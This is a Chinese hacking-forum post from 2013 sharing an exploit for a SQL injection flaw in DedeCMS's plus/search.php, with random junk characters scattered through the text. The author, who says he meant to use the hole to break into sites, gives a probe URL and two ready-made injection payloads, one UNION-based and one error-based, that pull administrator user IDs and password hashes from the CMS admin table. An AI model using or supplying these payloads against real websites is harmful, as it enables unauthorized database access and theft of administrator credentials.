找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2269|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ" @4 i, @8 h/ J3 o( Y3 v! s! ~3 ^
& F1 |% [- A9 a1 e
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。. @. W& T# Q' S* V( {& m* a

, y% E2 {; v( k; ]既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
& W) m. N+ |# Z4 l
) E: m0 \6 y' n/ d我一般是这样测试的:
# ?' I9 L/ n2 p8 R  l3 o+ j1 q$ }3 U6 ]1 E$ s9 l" s
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a1 A' }5 h6 q( T2 b

1 ?% J8 D6 k& S) D, U; q7 M转载不加作者名的没JJ
& Z+ s* f% I; @7 m! l- n0 e! i1 E3 I6 {, B  w
作者:鬼哥* f3 o8 _% v3 ]1 z9 L

3 x5 h/ L0 q5 _) H ' Q( b3 G" p. T4 z4 B

5 k) ]; s% g$ p' s# j看结果如果提示" \% \) ]! L* r, f' o

: L1 h! S' f5 p, KSafe Alert: Request Error step 2 !
+ `; n* W  g9 F  g( \! j/ k/ k/ I; {8 U
那么直接用下面的exp& q* x0 S% I2 q8 p( k

! w( b2 _1 S' W3 @* H, J8 Lxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
. w4 W8 f& @# Y, H. Y+ c9 a/ @* A5 {$ n$ y- W* @; B# `

* s! b5 ~8 z. R* I9 [" D/ {看结果如果提示
  t/ J4 \6 {: c1 w  ?, ~
+ g% R) ~8 t4 ^; iSafe Alert: Request Error step 1 !2 {- \, w7 `5 a# M6 e' _

: P0 Q! k) R, M, a& u, O那么直接用下面的exp
' Q; b$ ]" W4 `0 |( V' g
  v: F) S$ c+ mxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a+ Q. ]4 ^1 Q3 a0 x3 F# g. [" ?

0 A! `8 r6 V- M5 N4 |# \/ M4 B* J8 P4 p8 [
如果正常显示证明漏洞不存在了。
% r9 ~' {5 t& d2 g+ p) h' J8 _( M" ~% N! m
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表